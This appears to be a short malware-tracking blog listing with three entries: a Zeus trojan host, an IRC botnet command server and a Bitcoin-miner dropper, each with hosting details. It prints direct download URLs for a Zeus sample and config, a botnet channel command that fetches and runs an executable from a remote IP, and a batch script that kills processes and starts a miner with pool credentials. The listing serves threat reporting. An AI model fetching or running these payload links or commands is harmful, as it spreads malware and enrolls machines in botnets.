Author: Pig

zxz666.darktech.org(zeus hosted in Russian Federation Moscow Ojsc Vimpelcom)

Uncategorized

zeus sample here http://zxz666.darktech.org/zeus/builder/bot.exe zeus config file here http://zxz666.darktech.org/zeus/builder/cfg2.bin when u open zxz666.darktech.org u are redirected to vkontakte.ru wich ask for login maybe masking atempt or vkontakte.ru is now used to control zeus bots zeus samples just in case they get deleted by the hecker hosting infos: http://whois.domaintools.com/93.80.96.91

173.163.245.113(irc botnet hosted in United States Albuquerque Comcast Business Communications Llc)

Uncategorized

C&C Server: 173.163.245.113:9090 Server Password: Username: MEAT Nickname: {iNF-00-DEU-XP-DELL-3588} Channel: ##hxxp## (Password: ) Channeltopic: :.http http://67.247.34.106/02.02.exe |.scan svrsvc_KOR 50 10 0 -c Now talking in ##hxxp## Topic On: [ ##hxxp## ] [ .http http://67.247.34.106/02.02.exe |.scan svrsvc_KOR 50 10 0 -c ] Topic 11 By 12: [ pe[ro ] hosting infos: http://whois.domaintools.com/173.163.245.113

sfx.dload.asia(BitMines-btc.miner.03 hosted in Germany Hetzner Online Ag)

Uncategorized

Resolved : [sfx.dload.asia] To [176.9.42.247] Resolved : [sfx.dload.asia] To [188.40.92.153] Resolved : [sfx.dload.asia] To [188.40.93.82] yz.bat: ping -n 2 127.0.0.1 taskkill /f /im svchoost.exe taskkill /f /im mamita.exe taskkill /f /im x11811.exe taskkill /f /im Winlogon2.exe x30811.exe -a 60 -g yes -o http://sfx.dload.asia:8332/ -u redem_g -p x1x2x3x4x5 -t 2 file downloaded after login: http://sfx.dload.asia:8332/ -uRead more...